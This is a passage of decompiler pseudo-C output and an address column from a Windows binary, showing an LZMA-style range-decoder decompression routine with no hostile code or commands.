												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
